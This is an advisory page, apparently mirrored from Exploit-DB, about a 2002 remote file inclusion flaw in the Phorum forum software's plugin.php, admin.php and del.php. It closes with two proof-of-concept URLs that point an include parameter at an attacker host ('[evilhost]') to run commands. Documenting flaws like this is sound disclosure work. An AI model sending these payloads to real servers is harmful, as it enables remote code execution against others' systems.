Phorum Remote Code Execution Vulnerability

vendor:

Phorum

by:

SecurityFocus

9.3

CVSS

HIGH

Remote Code Execution

CWE

Product Name: Phorum

Affected Version From: 3.4.2000

Affected Version To: 3.4.2002

Patch Exists: YES

Related CWE: CVE-2002-1390

CPE: o:php:phorum

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: UNIX variants, Linux, and Microsoft Windows

2002

Phorum Remote Code Execution Vulnerability

Phorum is vulnerable to remote code execution due to improper input validation in the 'plugin.php', 'admin.php' and 'del.php' files. An attacker can specify the location of a parameter to the vulnerable PHP files by passing an argument via URL to the PHP files.

Mitigation:

Upgrade to the latest version of Phorum.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/4763/info

Phorum is a PHP based web forums package designed for most UNIX variants, Linux, and Microsoft Windows operating systems.

A vulnerability has been reported in Phorum that will allow remote attackers to specify external PHP scripts and potentially execute commands.

The vulnerability exists in 'plugin.php','admin.php' and 'del.php' files found in the distribution of Phorum. It is possible for a malicious attacker to specify the location of a parameter to the vulnerable PHP files by passing an argument via URL to the PHP files. 

http://[target]/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://[evilhost]&cmd=ls

http://[vulnerablehost]/phorum/admin/actions/del.php?include_path=http://[evilhost]&cmd=ls